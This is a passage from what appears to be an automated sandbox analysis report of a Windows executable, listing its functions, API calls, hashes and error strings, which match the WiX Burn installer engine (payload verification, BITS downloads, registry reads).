                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00919187
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify hash of payload: %ls, xrefs: 00919172
                                                                                                                                                                    • Failed to verify catalog signature of payload: %ls, xrefs: 0091914E
                                                                                                                                                                    • cache.cpp, xrefs: 009190F6
                                                                                                                                                                    • Failed to open payload at path: %ls, xrefs: 00919103
                                                                                                                                                                    • Failed to verify signature of payload: %ls, xrefs: 0091912F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                    • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                    • API String ID: 2528220319-2757871984
                                                                                                                                                                    • Opcode ID: b7c9bb5d1388bb13f7c4cd92ecb5273d6ca46a5a1ab2e9b59bde98d3f26aad1b
                                                                                                                                                                    • Instruction ID: 2bd42c3dd63b5de1457934d4335735a09c02367460a4e5d5640d3a9390a3cd0b
                                                                                                                                                                    • Opcode Fuzzy Hash: b7c9bb5d1388bb13f7c4cd92ecb5273d6ca46a5a1ab2e9b59bde98d3f26aad1b
                                                                                                                                                                    • Instruction Fuzzy Hash: A121E23674862FBBCB321A688C5DFEA7B19AF807A1F104211FD14661A093319DE1EAD1
                                                                                                                                                                    Function 00906B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00906B69
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906B73
                                                                                                                                                                    • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00906BB7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906BC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                    • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 124030351-4026719079
                                                                                                                                                                    • Opcode ID: b65a26540ef8b6feb72ccb2b949189ed36efb7b0dc669cea58f764b3ebf1eba5
                                                                                                                                                                    • Instruction ID: a075889995d90eae06a7e369c62919dfc50404bc4de2273eeb810900adace839
                                                                                                                                                                    • Opcode Fuzzy Hash: b65a26540ef8b6feb72ccb2b949189ed36efb7b0dc669cea58f764b3ebf1eba5
                                                                                                                                                                    • Instruction Fuzzy Hash: CB2138B7E452386FD72097549C0AF9B73AC9B81B20F014565BE04FB2C1EB34EE408AE5
                                                                                                                                                                    Function 00909C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909C88
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0090A895,00000100,000002C0,000002C0,?,000002C0), ref: 00909CA0
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00909CAB
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909C93
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909CFD
                                                                                                                                                                    • search.cpp, xrefs: 00909CDB
                                                                                                                                                                    • Failed get to file attributes. '%ls', xrefs: 00909CE8
                                                                                                                                                                    • Failed to set variable., xrefs: 00909D2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                    • API String ID: 1811509786-2053429945
                                                                                                                                                                    • Opcode ID: 3ab6999f9c28ef1ff9a4fcb3de470cb39631eb5b692a20004f7ba38a9e7a6d43
                                                                                                                                                                    • Instruction ID: 6994ece70c40aa7d63338b05a651686467549b53fcbb337ec025f56fb7879e55
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab6999f9c28ef1ff9a4fcb3de470cb39631eb5b692a20004f7ba38a9e7a6d43
                                                                                                                                                                    • Instruction Fuzzy Hash: 50216533D81134BEEB211A988C46FAEB66CEF91775F200221FE18760D2D771AD00A6D1
                                                                                                                                                                    Function 0091AD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 0091AD57
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091AD61
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0091ADA0
                                                                                                                                                                    • CoUninitialize.OLE32(?,0091C721,?,?), ref: 0091ADDD
                                                                                                                                                                    Strings
                                                                                                                                                                    • elevation.cpp, xrefs: 0091AD85
                                                                                                                                                                    • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0091AD8F
                                                                                                                                                                    • Failed to initialize COM., xrefs: 0091ADAC
                                                                                                                                                                    • Failed to pump messages in child process., xrefs: 0091ADCB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                    • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                    • API String ID: 876858697-113251691
                                                                                                                                                                    • Opcode ID: f783d4faafba8dc83270500207b16bb9f8958553281f717830af66ca5f71fc51
                                                                                                                                                                    • Instruction ID: 7aa0f723eca34370f848d226d2ba7cba08980a38e9a2be619d18fa8240f3d12a
                                                                                                                                                                    • Opcode Fuzzy Hash: f783d4faafba8dc83270500207b16bb9f8958553281f717830af66ca5f71fc51
                                                                                                                                                                    • Instruction Fuzzy Hash: 3411537AA06A38BB87225796EC0AEDEBA68EF85B627010116FD00B7180DB709C4093D1
                                                                                                                                                                    Function 00905CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00905D68
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                    • API String ID: 1979452859-3209209246
                                                                                                                                                                    • Opcode ID: 7c67e2a05338e0d78c2ce61bd0f20bfe122b115439928963d3a2347323db3a44
                                                                                                                                                                    • Instruction ID: f7c8bcf1b39be529b6ad3ac9c7ea7e9c88e0f486107476b1528d5700dd77e791
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c67e2a05338e0d78c2ce61bd0f20bfe122b115439928963d3a2347323db3a44
                                                                                                                                                                    • Instruction Fuzzy Hash: 19012836A45628BBCF2256A4DC0AF9F77A8CF81724F164256F900B62E0D7718E00DBD0
                                                                                                                                                                    Function 0092A271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0092A33E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0092A348
                                                                                                                                                                    Strings
                                                                                                                                                                    • :, xrefs: 0092A3C1
                                                                                                                                                                    • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0092A377
                                                                                                                                                                    • download, xrefs: 0092A308
                                                                                                                                                                    • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0092A425
                                                                                                                                                                    • apply.cpp, xrefs: 0092A36C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                                                                                    • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                    • API String ID: 1799206407-1905830404
                                                                                                                                                                    • Opcode ID: e1e91a75c4d5fae2cd0e90ad0f6cd9580a1c4879e30e3bad719186a39403a35d
                                                                                                                                                                    • Instruction ID: b7f4e14991d79088a8adb449062a3f375a1b5f304bbad1ac98805be5ebd937f4
                                                                                                                                                                    • Opcode Fuzzy Hash: e1e91a75c4d5fae2cd0e90ad0f6cd9580a1c4879e30e3bad719186a39403a35d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7551A172E00229EFDB10DFA9E841EAEB7B8FF44710F108059E814EB254E375EA40CB91
                                                                                                                                                                    Function 009484C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00929063,000002C0,00000100), ref: 009484F5
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00929063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00948510
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                    • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                    • API String ID: 2664528157-4206478990
                                                                                                                                                                    • Opcode ID: 78a8ef9c62975776aa379be45a8bd700071b53a178820b22b9fc521f8ddf0b62
                                                                                                                                                                    • Instruction ID: 17e1e1b8cf1120cbcfb2eaa6ad570fff00b10c82bb2a849defe1b65b497978ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 78a8ef9c62975776aa379be45a8bd700071b53a178820b22b9fc521f8ddf0b62
                                                                                                                                                                    • Instruction Fuzzy Hash: 0151CF71644301AFEB609F58CC85F1F7BA9AF40720F218658FA69EB2D1DB70ED409B50
                                                                                                                                                                    Function 009464B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00946513
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0094660A
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00946619
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                                                    • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                                                                    • API String ID: 3522763407-1704223933
                                                                                                                                                                    • Opcode ID: 04339ba6715fac22e9e9259e262cc14737d67f0d3befe720b553c808806f1c05
                                                                                                                                                                    • Instruction ID: dae1decfbb4d16cd85ab7c5d75a501a585501f46aa4d03176b09487ab1bfcb43
                                                                                                                                                                    • Opcode Fuzzy Hash: 04339ba6715fac22e9e9259e262cc14737d67f0d3befe720b553c808806f1c05
                                                                                                                                                                    • Instruction Fuzzy Hash: E55114B6D00229ABDF12DFA48C45EEEBBBDEB49710F014165FA14E6190E7318A119BA1
                                                                                                                                                                    Function 00909EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909EED
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909F12
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format component id string., xrefs: 00909EF8
                                                                                                                                                                    • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A006
                                                                                                                                                                    • Failed to set variable., xrefs: 00909FF6
                                                                                                                                                                    • Failed to format product code string., xrefs: 00909F1D
                                                                                                                                                                    • Failed to get component path: %d, xrefs: 00909F76
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                    • API String ID: 3613110473-1671347822
                                                                                                                                                                    • Opcode ID: a6e9dfc7cf4bdac73383b82d20713e4987ef5005fd3b9148b1adaec69571263a
                                                                                                                                                                    • Instruction ID: d6edb6c500219ab6bfda243e907983441ac64e26d2f547225f5438a7c7330545
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e9dfc7cf4bdac73383b82d20713e4987ef5005fd3b9148b1adaec69571263a
                                                                                                                                                                    • Instruction Fuzzy Hash: A041D63290011ABECF25AAA88C46FBEB77CEF85320F244616F724E61D2D7319E50D791
                                                                                                                                                                    Function 0090F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0090F942
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0090F94F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open registration key., xrefs: 0090F8AB
                                                                                                                                                                    • Resume, xrefs: 0090F8B6
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 0090F82F
                                                                                                                                                                    • Failed to format pending restart registry key to read., xrefs: 0090F846
                                                                                                                                                                    • Failed to read Resume value., xrefs: 0090F8D8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                    • API String ID: 3535843008-3890505273
                                                                                                                                                                    • Opcode ID: 0fa40ee90b2bd17758809be5266b1b2b20ccfa6b84760532df0d72c2f6bd5754
                                                                                                                                                                    • Instruction ID: 225ba1288641958602518a05cc930aa81ccbc9eb62ab324986cb595e7b4b7524
                                                                                                                                                                    • Opcode Fuzzy Hash: 0fa40ee90b2bd17758809be5266b1b2b20ccfa6b84760532df0d72c2f6bd5754
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A412A71901219FFCB21DF98C891BADBBB8FB44314F158176ED21ABA90C375AF45AB40
                                                                                                                                                                    Function 0091AA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                    • API String ID: 0-660234312
                                                                                                                                                                    • Opcode ID: 598f701e01a654e973ba6a5f4f5c26a01f39d0b732c8a264ebe88faffedae8eb
                                                                                                                                                                    • Instruction ID: 431155f17eba2cfae7fc0bf56e4b276c385dfddbe28d986c7134816ff9eb4b66
                                                                                                                                                                    • Opcode Fuzzy Hash: 598f701e01a654e973ba6a5f4f5c26a01f39d0b732c8a264ebe88faffedae8eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A319332A0512DBFDB229AA4CD45FEEBA7A9F44720F114251F920A71D0DB719D80D791
                                                                                                                                                                    Function 0092D8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoCreateInstance.OLE32(00960C4C,00000000,00000017,00960C5C,?,?,00000000,00000000,?,?,?,?,?,0092DEE7,00000000,00000000), ref: 0092D8E8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set notification flags for BITS job., xrefs: 0092D93A
                                                                                                                                                                    • Failed to set progress timeout., xrefs: 0092D952
                                                                                                                                                                    • Failed to create IBackgroundCopyManager., xrefs: 0092D8F4
                                                                                                                                                                    • Failed to create BITS job., xrefs: 0092D922
                                                                                                                                                                    • Failed to set BITS job to foreground., xrefs: 0092D969
                                                                                                                                                                    • WixBurn, xrefs: 0092D913
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                    • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                    • API String ID: 542301482-468763447
                                                                                                                                                                    • Opcode ID: a0f8b6371f78519a4190e8ced4d1e17008687c08dd9b5515fa04a101fc96ec39
                                                                                                                                                                    • Instruction ID: a52b8e307fa4615a557fc9e6b503254693207bb89e3518c731b5e7bb0c1d3012
                                                                                                                                                                    • Opcode Fuzzy Hash: a0f8b6371f78519a4190e8ced4d1e17008687c08dd9b5515fa04a101fc96ec39
                                                                                                                                                                    • Instruction Fuzzy Hash: F631A375F42329AFDB14DFA9D885E7FBBB4AF88710B000559FA01EB350CA749C458B90
                                                                                                                                                                    Function 00945DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00945DF8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945E05
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00945E4C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945E80
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00945EB4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
